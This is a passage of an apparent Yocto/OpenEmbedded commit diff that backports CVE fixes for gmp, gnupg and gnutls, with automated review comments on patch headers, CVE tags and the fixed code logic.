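+# HG changeset patch
+# User Marco Bodrato <bodrato@mail.dm.unipi.it>
+# Date 1634836009 -7200
+# Node ID 561a9c25298e17bb01896801ff353546c6923dbd
+# Parent e1fd9db13b475209a864577237ea4b9105b3e96e
+mpz/inp_raw.c: Avoid bit size overflows
+
+diff -r e1fd9db13b47 -r 561a9c25298e mpz/inp_raw.c
+--- a/mpz/inp_raw.c Tue Dec 22 23:49:51 2020 +0100
++++ b/mpz/inp_raw.c Thu Oct 21 19:06:49 2021 +0200
+@@ -88,8 +88,11 @@
+
+ abs_csize = ABS (csize);
+
++ if (UNLIKELY (abs_csize > ~(mp_bitcnt_t) 0 / 8))
++ return 0; /* Bit size overflows */
++
+ /* round up to a multiple of limbs */
+- abs_xsize = BITS_TO_LIMBS (abs_csize*8);
++ abs_xsize = BITS_TO_LIMBS ((mp_bitcnt_t) abs_csize * 8);
+
+ if (abs_xsize != 0)
+ {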
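Review bot: `Upstream-Status: Backport` carries no reference, so the only link back to upstream is the Mercurial node ID buried in the changeset header; the other CVE patches in this commit put a URL or commit in brackets. I would write it as `Upstream-Status: Backport [<upstream changeset URL for 561a9c25298e>]`. The file name is also lower-case `cve-2021-43618.patch` where the other patches use `CVE-…`, which makes it easy to miss when searching the tree for patched CVEs by file name.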
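diff --git a/meta/recipes-support/gmp/gmp_6.2.0.bb b/meta/recipes-support/gmp/gmp_6.2.0.bb
index a19c74fca8..d29b74f829 100644
--- a/meta/recipes-support/gmp/gmp_6.2.0.bb
+++ b/meta/recipes-support/gmp/gmp_6.2.0.bb
@@ -12,6 +12,7 @@ SRC_URI = "https://gmplib.org/download/${BPN}/${BP}${REVISION}.tar.bz2 \
  file://use-includedir.patch \
  file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \
  file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \
+ file://cve-2021-43618.patch \
  "
 SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21"
 SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea"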
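diff --git a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
index 0defebeb15..19f32e8d1f 100644
--- a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
+++ b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
@@ -1,11 +1,15 @@
 SUMMARY = "Test runner for GNOME-style installed tests"
+DESCRIPTION = "Runner provides an execution harness for GNOME installed tests. \
+These tests are useful for verifying the functionality of software as \
+installed and packaged, and complement rather than replace build-time \
+('make check') tests."
 HOMEPAGE = "https://wiki.gnome.org/GnomeGoals/InstalledTests"
 LICENSE = "LGPLv2+"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \
  file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4"
 
-SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http"
+SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http;branch=master"
 SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48"
 
 DEPENDS = "glib-2.0"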
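diff --git a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
index 2c204e0245..a0af2d48dc 100644
--- a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
+++ b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
@@ -1,4 +1,4 @@
-From e7ad11cf54475e455fdb84d118e4782961698567 Mon Sep 17 00:00:00 2001
+From abc5c396aaddaef2e6811362e3e0cc0da28c2b34 Mon Sep 17 00:00:00 2001
 From: Alexander Kanavin <alex.kanavin@gmail.com>
 Date: Mon, 22 Jan 2018 18:00:21 +0200
 Subject: [PATCH] configure.ac: use a custom value for the location of
@@ -14,10 +14,10 @@ Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
  1 file changed, 1 insertion(+), 1 deletion(-)
 
 diff --git a/configure.ac b/configure.ac
-index 919ab31..cd58fdb 100644
+index 64cb8c6..3fe9027 100644
 --- a/configure.ac
 +++ b/configure.ac
-@@ -1855,7 +1855,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
+@@ -1824,7 +1824,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
 
  AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool])
 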
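diff --git a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
index 3e798efd06..a13b4d5fb5 100644
--- a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
+++ b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
@@ -1,7 +1,7 @@
-From 9c3858ffda6246bf9e1e6aeeb920532a56b19408 Mon Sep 17 00:00:00 2001
+From 6c75656b68cb6e38b039ae532bd39437cd6daec5 Mon Sep 17 00:00:00 2001
 From: Saul Wold <sgw@linux.intel.com>
 Date: Wed, 16 Aug 2017 11:18:01 +0800
-Subject: [PATCH 3/4] dirmngr uses libgpg error
+Subject: [PATCH] dirmngr uses libgpg error
 
 Upstream-Status: Pending
 Signed-off-by: Saul Wold <sgw@linux.intel.com>
@@ -9,24 +9,20 @@ Signed-off-by: Saul Wold <sgw@linux.intel.com>
 Rebase to 2.1.23
 
 Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+
 ---
- dirmngr/Makefile.am | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
+ dirmngr/Makefile.am | 1 +
+ 1 file changed, 1 insertion(+)
 
 diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am
-index b404165..d3f916e 100644
+index 00d3c42..450d873 100644
 --- a/dirmngr/Makefile.am
 +++ b/dirmngr/Makefile.am
-@@ -82,7 +82,8 @@ endif
- dirmngr_LDADD = $(libcommonpth) \
+@@ -101,6 +101,7 @@ dirmngr_LDADD = $(libcommonpth) \
  $(DNSLIBS) $(LIBASSUAN_LIBS) \
  $(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \
-- $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV)
-+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) \
-+ $(GPG_ERROR_LIBS)
+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) $(NETLIBS) \
++ $(GPG_ERROR_LIBS) \
+ $(dirmngr_robj)
  if USE_LDAP
  dirmngr_LDADD += $(ldaplibs)
- endif
---
-1.8.3.1
-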
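diff --git a/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
new file mode 100644
index 0000000000..5992949d35
--- /dev/null
+++ b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
@@ -0,0 +1,44 @@
+From 2f05fc96b1332caf97176841b1152da3f0aa16a8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 22 Jul 2022 17:52:36 +0530
+Subject: [PATCH] CVE-2022-34903
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=gnupg.git;a=commit;h=34c649b3601383cd11dbc76221747ec16fd68e1b]
+CVE: CVE-2022-34903
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ g10/cpr.c | 13 ++++---------
+ 1 file changed, 4 insertions(+), 9 deletions(-)
+
+diff --git a/g10/cpr.c b/g10/cpr.c
+index d502e8b..bc4b715 100644
+--- a/g10/cpr.c
++++ b/g10/cpr.c
+@@ -328,20 +328,15 @@ write_status_text_and_buffer (int no, const char *string,
+ }
+ first = 0;
+ }
+- for (esc=0, s=buffer, n=len; n && !esc; s++, n--)
++ for (esc=0, s=buffer, n=len; n; s++, n--)
+ {
+ if (*s == '%' || *(const byte*)s <= lower_limit
+ || *(const byte*)s == 127 )
+ esc = 1;
+ if (wrap && ++count > wrap)
+- {
+- dowrap=1;
+- break;
+- }
+- }
+- if (esc)
+- {
+- s--; n++;
++ dowrap=1;
++ if (esc || dowrap)
++ break;
+ }
+ if (s != buffer)
+ es_fwrite (buffer, s-buffer, 1, statusfp);
+--
+2.25.1
+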
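Review bot: The patch header names only the CVE id (`Subject: [PATCH] CVE-2022-34903`) and does not say what was wrong in `write_status_text_and_buffer`, so anyone rebasing it later has to re-derive that from the hunk. From the visible lines, the old loop could `break` for wrapping before `s++, n--` ran and still apply `s--; n++` when `esc` had been set on that same character, stepping back one byte too far; the new loop breaks on `esc || dowrap` before the increment and drops the fix-up. I would put a one-line summary in the header, for example `g10/cpr.c: stop the scan at the character that needs escaping or wrapping instead of backing up afterwards`. The function starts and ends outside the hunk, so the effect on the rest of the status output is inferred rather than visible here.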
diff --git a/meta/recipes-support/gnupg/gnupg/relocate.patch b/meta/recipes-support/gnupg/gnupg/relocate.patch
index e5a82aa76d..7f7812cd46 100644
--- a/meta/recipes-support/gnupg/gnupg/relocate.patch
+++ b/meta/recipes-support/gnupg/gnupg/relocate.patch
@@ -1,4 +1,4 @@
1From 59c077f32e81190955910cae02599c7a3edfa7fb Mon Sep 17 00:00:00 2001 1From bd66af2ac7bb6d9294ac8055a55462ba7c4f9c9b Mon Sep 17 00:00:00 2001
2From: Ross Burton <ross.burton@intel.com> 2From: Ross Burton <ross.burton@intel.com>
3Date: Wed, 19 Sep 2018 14:44:40 +0100 3Date: Wed, 19 Sep 2018 14:44:40 +0100
4Subject: [PATCH] Allow the environment to override where gnupg looks for its 4Subject: [PATCH] Allow the environment to override where gnupg looks for its
@@ -12,10 +12,10 @@ Signed-off-by: Ross Burton <ross.burton@intel.com>
12 1 file changed, 8 insertions(+), 8 deletions(-) 12 1 file changed, 8 insertions(+), 8 deletions(-)
13 13
14diff --git a/common/homedir.c b/common/homedir.c 14diff --git a/common/homedir.c b/common/homedir.c
15index e9e75d0..19140aa 100644 15index 4b6e46e..58989b4 100644
16--- a/common/homedir.c 16--- a/common/homedir.c
17+++ b/common/homedir.c 17+++ b/common/homedir.c
18@@ -760,7 +760,7 @@ gnupg_socketdir (void) 18@@ -763,7 +763,7 @@ gnupg_socketdir (void)
19 if (!name) 19 if (!name)
20 { 20 {
21 unsigned int dummy; 21 unsigned int dummy;
@@ -24,7 +24,7 @@ index e9e75d0..19140aa 100644
24 } 24 }
25 25
26 return name; 26 return name;
27@@ -786,7 +786,7 @@ gnupg_sysconfdir (void) 27@@ -789,7 +789,7 @@ gnupg_sysconfdir (void)
28 } 28 }
29 return name; 29 return name;
30 #else /*!HAVE_W32_SYSTEM*/ 30 #else /*!HAVE_W32_SYSTEM*/
@@ -33,7 +33,7 @@ index e9e75d0..19140aa 100644
33 #endif /*!HAVE_W32_SYSTEM*/ 33 #endif /*!HAVE_W32_SYSTEM*/
34 } 34 }
35 35
36@@ -815,7 +815,7 @@ gnupg_bindir (void) 36@@ -818,7 +818,7 @@ gnupg_bindir (void)
37 else 37 else
38 return rdir; 38 return rdir;
39 #else /*!HAVE_W32_SYSTEM*/ 39 #else /*!HAVE_W32_SYSTEM*/
@@ -42,7 +42,7 @@ index e9e75d0..19140aa 100644
42 #endif /*!HAVE_W32_SYSTEM*/ 42 #endif /*!HAVE_W32_SYSTEM*/
43 } 43 }
44 44
45@@ -828,7 +828,7 @@ gnupg_libexecdir (void) 45@@ -831,7 +831,7 @@ gnupg_libexecdir (void)
46 #ifdef HAVE_W32_SYSTEM 46 #ifdef HAVE_W32_SYSTEM
47 return gnupg_bindir (); 47 return gnupg_bindir ();
48 #else /*!HAVE_W32_SYSTEM*/ 48 #else /*!HAVE_W32_SYSTEM*/
@@ -51,7 +51,7 @@ index e9e75d0..19140aa 100644
51 #endif /*!HAVE_W32_SYSTEM*/ 51 #endif /*!HAVE_W32_SYSTEM*/
52 } 52 }
53 53
54@@ -842,7 +842,7 @@ gnupg_libdir (void) 54@@ -845,7 +845,7 @@ gnupg_libdir (void)
55 name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL); 55 name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL);
56 return name; 56 return name;
57 #else /*!HAVE_W32_SYSTEM*/ 57 #else /*!HAVE_W32_SYSTEM*/
@@ -60,7 +60,7 @@ index e9e75d0..19140aa 100644
60 #endif /*!HAVE_W32_SYSTEM*/ 60 #endif /*!HAVE_W32_SYSTEM*/
61 } 61 }
62 62
63@@ -856,7 +856,7 @@ gnupg_datadir (void) 63@@ -859,7 +859,7 @@ gnupg_datadir (void)
64 name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL); 64 name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL);
65 return name; 65 return name;
66 #else /*!HAVE_W32_SYSTEM*/ 66 #else /*!HAVE_W32_SYSTEM*/
@@ -69,7 +69,7 @@ index e9e75d0..19140aa 100644
69 #endif /*!HAVE_W32_SYSTEM*/ 69 #endif /*!HAVE_W32_SYSTEM*/
70 } 70 }
71 71
72@@ -872,7 +872,7 @@ gnupg_localedir (void) 72@@ -875,7 +875,7 @@ gnupg_localedir (void)
73 NULL); 73 NULL);
74 return name; 74 return name;
75 #else /*!HAVE_W32_SYSTEM*/ 75 #else /*!HAVE_W32_SYSTEM*/
@@ -78,7 +78,7 @@ index e9e75d0..19140aa 100644
78 #endif /*!HAVE_W32_SYSTEM*/ 78 #endif /*!HAVE_W32_SYSTEM*/
79 } 79 }
80 80
81@@ -940,7 +940,7 @@ gnupg_cachedir (void) 81@@ -943,7 +943,7 @@ gnupg_cachedir (void)
82 } 82 }
83 return dir; 83 return dir;
84 #else /*!HAVE_W32_SYSTEM*/ 84 #else /*!HAVE_W32_SYSTEM*/
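diff --git a/meta/recipes-support/gnupg/gnupg_2.2.20.bb b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
index f754573c88..bd09b02017 100644
--- a/meta/recipes-support/gnupg/gnupg_2.2.20.bb
+++ b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
@@ -1,4 +1,9 @@
 SUMMARY = "GNU Privacy Guard - encryption and signing tools (2.x)"
+DESCRIPTION = "A complete and free implementation of the OpenPGP standard \
+as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt \
+and sign your data and communications; it features a versatile key \
+management system, along with access modules for all kinds of public \
+key directories."
 HOMEPAGE = "http://www.gnupg.org/"
 LICENSE = "GPLv3 & LGPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=189af8afca6d6075ba6c9e0aa8077626 \
@@ -15,19 +20,20 @@ SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
  file://0003-dirmngr-uses-libgpg-error.patch \
  file://0004-autogen.sh-fix-find-version-for-beta-checking.patch \
  file://0001-Woverride-init-is-not-needed-with-gcc-9.patch \
+ file://CVE-2022-34903.patch \
  "
 SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for-the-location-of-.patch \
  file://relocate.patch"
 SRC_URI_append_class-nativesdk = " file://relocate.patch"
 
-SRC_URI[md5sum] = "4ff88920cf52b35db0dedaee87bdbbb1"
-SRC_URI[sha256sum] = "04a7c9d48b74c399168ee8270e548588ddbe52218c337703d7f06373d326ca30"
+SRC_URI[sha256sum] = "34e60009014ea16402069136e0a5f63d9b65f90096244975db5cea74b3d02399"
 
 EXTRA_OECONF = "--disable-ldap \
  --disable-ccid-driver \
  --with-zlib=${STAGING_LIBDIR}/.. \
  --with-bzip2=${STAGING_LIBDIR}/.. \
  --with-readline=${STAGING_LIBDIR}/.. \
+ --with-mailprog=${sbindir}/sendmail \
  --enable-gpg-is-gpg2 \
  "
 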
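diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
new file mode 100644
index 0000000000..6fe7a21e33
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
@@ -0,0 +1,67 @@
+From 15beb4b193b2714d88107e7dffca781798684e7e Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:32 +0100
+Subject: [PATCH] key_share: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/15beb4b193b2714d88107e7dffca781798684e7e
+Upstream-Status: Backport
+CVE: CVE-2021-CVE-2021-20231
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/key_share.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ext/key_share.c b/lib/ext/key_share.c
+index ab8abf8fe6..a8c4bb5cff 100644
+--- a/lib/ext/key_share.c
++++ b/lib/ext/key_share.c
+@@ -664,14 +664,14 @@ key_share_send_params(gnutls_session_t session,
+ {
+ unsigned i;
+ int ret;
+- unsigned char *lengthp;
+- unsigned int cur_length;
+ unsigned int generated = 0;
+ const gnutls_group_entry_st *group;
+ const version_entry_st *ver;
+
+ /* this extension is only being sent on client side */
+ if (session->security_parameters.entity == GNUTLS_CLIENT) {
++ unsigned int length_pos;
++
+ ver = _gnutls_version_max(session);
+ if (unlikely(ver == NULL || ver->key_shares == 0))
+ return 0;
+@@ -679,16 +679,13 @@ key_share_send_params(gnutls_session_t session,
+ if (!have_creds_for_tls13(session))
+ return 0;
+
+- /* write the total length later */
+- lengthp = &extdata->data[extdata->length];
++ length_pos = extdata->length;
+
+ ret =
+ _gnutls_buffer_append_prefix(extdata, 16, 0);
+ if (ret < 0)
+ return gnutls_assert_val(ret);
+
+- cur_length = extdata->length;
+-
+ if (session->internals.hsk_flags & HSK_HRR_RECEIVED) { /* we know the group */
+ group = get_group(session);
+ if (unlikely(group == NULL))
+@@ -736,7 +733,8 @@ key_share_send_params(gnutls_session_t session,
+ }
+
+ /* copy actual length */
+- _gnutls_write_uint16(extdata->length - cur_length, lengthp);
++ _gnutls_write_uint16(extdata->length - length_pos - 2,
++ &extdata->data[length_pos]);
+
+ } else { /* server */
+ ver = get_version(session);
+--
+GitLab
+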
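Review bot: The tag on line 10 of the new patch file reads `CVE: CVE-2021-CVE-2021-20231`, which is not a well-formed CVE identifier; it should be `CVE: CVE-2021-20231`. The same doubled prefix is in CVE-2021-20232.patch (`CVE: CVE-2021-CVE-2021-20232`, expected `CVE: CVE-2021-20232`). Tooling that reads the `CVE:` tag to mark an issue as patched may still find the id inside the string, but that depends on how the matcher is written, so the tag should be exact rather than relying on it.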
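diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
new file mode 100644
index 0000000000..e13917cddb
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
@@ -0,0 +1,65 @@
+From 75a937d97f4fefc6f9b08e3791f151445f551cb3 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:50 +0100
+Subject: [PATCH] pre_shared_key: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/75a937d97f4fefc6f9b08e3791f151445f551cb3
+Upstream-Status: Backport
+CVE: CVE-2021-CVE-2021-20232
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/pre_shared_key.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ext/pre_shared_key.c b/lib/ext/pre_shared_key.c
+index a042c6488e..380bf39ed5 100644
+--- a/lib/ext/pre_shared_key.c
++++ b/lib/ext/pre_shared_key.c
+@@ -267,7 +267,7 @@ client_send_params(gnutls_session_t session,
+ size_t spos;
+ gnutls_datum_t username = {NULL, 0};
+ gnutls_datum_t user_key = {NULL, 0}, rkey = {NULL, 0};
+- gnutls_datum_t client_hello;
++ unsigned client_hello_len;
+ unsigned next_idx;
+ const mac_entry_st *prf_res = NULL;
+ const mac_entry_st *prf_psk = NULL;
+@@ -428,8 +428,7 @@ client_send_params(gnutls_session_t session,
+ assert(extdata->length >= sizeof(mbuffer_st));
+ assert(ext_offset >= (ssize_t)sizeof(mbuffer_st));
+ ext_offset -= sizeof(mbuffer_st);
+- client_hello.data = extdata->data+sizeof(mbuffer_st);
+- client_hello.size = extdata->length-sizeof(mbuffer_st);
++ client_hello_len = extdata->length-sizeof(mbuffer_st);
+
+ next_idx = 0;
+
+@@ -440,6 +439,11 @@ client_send_params(gnutls_session_t session,
+ }
+
+ if (prf_res && rkey.size > 0) {
++ gnutls_datum_t client_hello;
++
++ client_hello.data = extdata->data+sizeof(mbuffer_st);
++ client_hello.size = client_hello_len;
++
+ ret = compute_psk_binder(session, prf_res,
+ binders_len, binders_pos,
+ ext_offset, &rkey, &client_hello, 1,
+@@ -474,6 +478,11 @@ client_send_params(gnutls_session_t session,
+ }
+
+ if (prf_psk && user_key.size > 0 && info) {
++ gnutls_datum_t client_hello;
++
++ client_hello.data = extdata->data+sizeof(mbuffer_st);
++ client_hello.size = client_hello_len;
++
+ ret = compute_psk_binder(session, prf_psk,
+ binders_len, binders_pos,
+ ext_offset, &user_key, &client_hello, 0,
+--
+GitLab
+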
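Review bot: The two added blocks that set `client_hello.data = extdata->data+sizeof(mbuffer_st);` have no comment saying why the pointer is taken at the point of use rather than once near the top, and the duplication invites a later cleanup that hoists it back. Going by the subject line ("avoid use-after-free around realloc"), the storage behind `extdata->data` can presumably move when data is appended between the old assignment and the `compute_psk_binder` calls. I would add `/* extdata->data may be reallocated by the appends above; take the pointer only here */` above each assignment. `client_send_params` starts and ends outside these hunks, so the intervening appends are not visible here.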
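diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
new file mode 100644
index 0000000000..0bcb55e573
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
@@ -0,0 +1,37 @@
+From 3db352734472d851318944db13be73da61300568 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Wed, 22 Dec 2021 09:12:25 +0100
+Subject: [PATCH] wrap_nettle_hash_fast: avoid calling _update with zero-length
+ input
+
+As Nettle's hash update functions internally call memcpy, providing
+zero-length input may cause undefined behavior.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568
+Upstream-Status: Backport
+CVE: CVE-2021-4209
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/nettle/mac.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/lib/nettle/mac.c b/lib/nettle/mac.c
+index f9d4d7a8df..35e070fab0 100644
+--- a/lib/nettle/mac.c
++++ b/lib/nettle/mac.c
+@@ -788,7 +788,9 @@ static int wrap_nettle_hash_fast(gnutls_digest_algorithm_t algo,
+ if (ret < 0)
+ return gnutls_assert_val(ret);
+
+- ctx.update(&ctx, text_size, text);
++ if (text_size > 0) {
++ ctx.update(&ctx, text_size, text);
++ }
+ ctx.digest(&ctx, ctx.length, digest);
+
+ return 0;
+--
+GitLab
+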
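diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
new file mode 100644
index 0000000000..f8954945d0
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
@@ -0,0 +1,282 @@
+From 9835638d4e1f37781a47e777c76d5bb14218929b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 12:23:14 +0530
+Subject: [PATCH] CVE-2022-2509
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/ce37f9eb265dbe9b6d597f5767449e8ee95848e2]
+CVE: CVE-2022-2509
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ NEWS | 4 +
+ lib/x509/pkcs7.c | 3 +-
+ tests/Makefile.am | 2 +-
+ tests/pkcs7-verify-double-free.c | 215 +++++++++++++++++++++++++++++++
+ 4 files changed, 222 insertions(+), 2 deletions(-)
+ create mode 100644 tests/pkcs7-verify-double-free.c
+
+diff --git a/NEWS b/NEWS
+index 755a67c..ba70bb3 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ See the end for copying conditions.
+
+ * Version 3.6.14 (released 2020-06-03)
+
++** libgnutls: Fixed double free during verification of pkcs7 signatures.
++ Reported by Jaak Ristioja (#1383). [GNUTLS-SA-2022-07-07, CVSS: medium]
++ [CVE-2022-2509]
++
+ ** libgnutls: Fixed insecure session ticket key construction, since 3.6.4.
+ The TLS server would not bind the session ticket encryption key with a
+ value supplied by the application until the initial key rotation, allowing
+diff --git a/lib/x509/pkcs7.c b/lib/x509/pkcs7.c
+index 98669e8..ccbc69d 100644
+--- a/lib/x509/pkcs7.c
++++ b/lib/x509/pkcs7.c
+@@ -1318,7 +1318,8 @@ gnutls_x509_crt_t find_signer(gnutls_pkcs7_t pkcs7, gnutls_x509_trust_list_t tl,
+ issuer = find_verified_issuer_of(pkcs7, issuer, purpose, vflags);
+
+ if (issuer != NULL && gnutls_x509_crt_check_issuer(issuer, issuer)) {
+- if (prev) gnutls_x509_crt_deinit(prev);
++ if (prev && prev != signer)
++ gnutls_x509_crt_deinit(prev);
+ prev = issuer;
+ break;
+ }
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index 11a083c..cd43a0f 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -219,7 +219,7 @@ ctests += mini-record-2 simple gnutls_hmac_fast set_pkcs12_cred cert certuniquei
+ tls-record-size-limit-asym dh-compute ecdh-compute sign-verify-data-newapi \
+ sign-verify-newapi sign-verify-deterministic iov aead-cipher-vec \
+ tls13-without-timeout-func buffer status-request-revoked \
+- set_x509_ocsp_multi_cli kdf-api keylog-func \
++ set_x509_ocsp_multi_cli kdf-api keylog-func pkcs7-verify-double-free \
+ dtls_hello_random_value tls_hello_random_value x509cert-dntypes
+
+ if HAVE_SECCOMP_TESTS
+diff --git a/tests/pkcs7-verify-double-free.c b/tests/pkcs7-verify-double-free.c
+new file mode 100644
+index 0000000..fadf307
+--- /dev/null
++++ b/tests/pkcs7-verify-double-free.c
+@@ -0,0 +1,215 @@
++/*
++ * Copyright (C) 2022 Red Hat, Inc.
++ *
++ * Author: Zoltan Fridrich
++ *
++ * This file is part of GnuTLS.
++ *
++ * GnuTLS is free software: you can redistribute it and/or modify it
++ * under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GnuTLS is distributed in the hope that it will be useful, but
++ * WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ * General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GnuTLS. If not, see <https://www.gnu.org/licenses/>.
++ */
++
++#ifdef HAVE_CONFIG_H
++#include <config.h>
++#endif
++
++#include <stdio.h>
++#include <gnutls/pkcs7.h>
++#include <gnutls/x509.h>
++
++#include "utils.h"
++
++static char rca_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDCjCCAfKgAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++ "cGxlIENBMCAXDTE3MDcyMTE0NDMzNloYDzIyMjIwNzIxMTQ0MzM2WjAVMRMwEQYD\n"
++ "VQQKDApFeGFtcGxlIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA\n"
++ "v8hnKPJ/IA0SQB/A/a0Uh+npZ67vsgIMrtTQo0r0kJkmkBz5323xO3DVuJfB3QmX\n"
++ "v9zvoeCQLuDvWar5Aixfxgm6s5Q+yPvJj9t3NebDrU+Y4+qyewBIJUF8EF/5iBPC\n"
++ "ZHONmzbfIRWvQWGGgb2CRcOHp2J7AY/QLB6LsWPaLjs/DHva28Q13JaTTHIpdu8v\n"
++ "t6vHr0nXf66DN4MvtoF3N+o+v3snJCMsfXOqASi4tbWR7gtOfCfiz9uBjh0W2Dut\n"
++ "/jclBQkJkLe6esNSM+f4YiOpctVDjmfj8yoHCp394vt0wFqhG38wsTFAyVP6qIcf\n"
++ "5zoSu9ovEt2cTkhnZHjiiwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud\n"
++ "DwEB/wQEAwIBBjAdBgNVHQ4EFgQUhjeO6Uc5imbjOl2I2ltVA27Hu9YwHwYDVR0j\n"
++ "BBgwFoAUhjeO6Uc5imbjOl2I2ltVA27Hu9YwDQYJKoZIhvcNAQELBQADggEBAD+r\n"
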